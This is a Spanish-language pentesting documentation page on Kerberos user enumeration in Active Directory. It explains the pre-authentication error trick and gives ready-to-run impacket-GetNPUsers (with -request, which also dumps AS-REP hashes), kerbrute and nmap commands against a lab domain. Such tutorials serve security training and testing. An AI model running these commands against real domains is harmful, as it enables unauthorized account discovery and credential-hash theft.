> For the complete documentation index, see [llms.txt](https://docs.iwolfsec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.iwolfsec.com/tecnicas-y-ataques/ataques-a-directorio-activo/enumeracion/enumeracion-de-usuarios-kerberos.md).

# Enumeración de usuarios Kerberos

## Descripción

La enumeración de usuarios en Kerberos consiste en hacer fuerza bruta al Active Directory mediante un diccionario de usuarios.

Para enumerar los usuario de Kerberos se envía una solicitud TGT sin pre-autenticación Si el KDC responde con el error `KDC_ERR_C_PRINCIPAL_UNKNOWN`, el nombre de usuario no existe. Sin embargo, si el KDC solicita pre-autenticación, sabemos que el nombre de usuario existe.&#x20;

Esto no causa ningún error de inicio de sesión, por lo que no bloqueará la cuenta.&#x20;

Para llevar a cabo la enumeración de usuarios en Kerberos se pueden utilizar las siguientes herramientas:

* Impacket-GetNPUsers
* Kerbrute
* Nmap

La lista de usuarios para la enumeración tiene que tener el siguiente formato:

{% code title="users.txt " %}

```
iwolf
papa
administrator
danj
adamb
alans
chrisn
...
```

{% endcode %}

### **Impacket-GetNPUsers**

`impacket-GetNPUsers atlanta.corp/ -usersfile /home/iwolf/Desktop/users.txt -dc-ip 10.0.0.128 -request`

{% hint style="info" %}
`En este caso se ha indicado el falg -request para que, si encuentra una cuenta que no requiere pre-autenticación automaticamente muestre el HASH del usuario.`
{% endhint %}

![](https://3466771414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDvfkN71yF6JgtgQ5SC7C%2Fuploads%2FhaQTpzvUdadqy1KGuUcK%2Fimage.png?alt=media\&token=2668e006-26b9-4c82-9d5a-5420acd9bd4d)

### **Kerbrute**

`./kerbrute userenum --dc 10.0.0.128 -d atlanta.corp /home/iwolf/Desktop/users.txt`

![](https://3466771414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDvfkN71yF6JgtgQ5SC7C%2Fuploads%2FJHGwepJjkf2BtMMJMfTX%2Fimage.png?alt=media\&token=80c63741-89b0-44ae-9786-9d51e8b2c5f5)

### Nmap

`nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='atlanta.corp',userdb=/home/iwolf/Desktop/users.txt 10.0.0.128 -Pn`

![](https://3466771414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDvfkN71yF6JgtgQ5SC7C%2Fuploads%2F0Pikwj2sciPXaOCYbNnX%2Fimage.png?alt=media\&token=fd972908-8390-42ae-abc7-40562dfbeb63)

## Referencias

{% embed url="<https://github.com/ropnop/kerbrute>" %}

{% embed url="<https://github.com/SecureAuthCorp/impacket>" %}
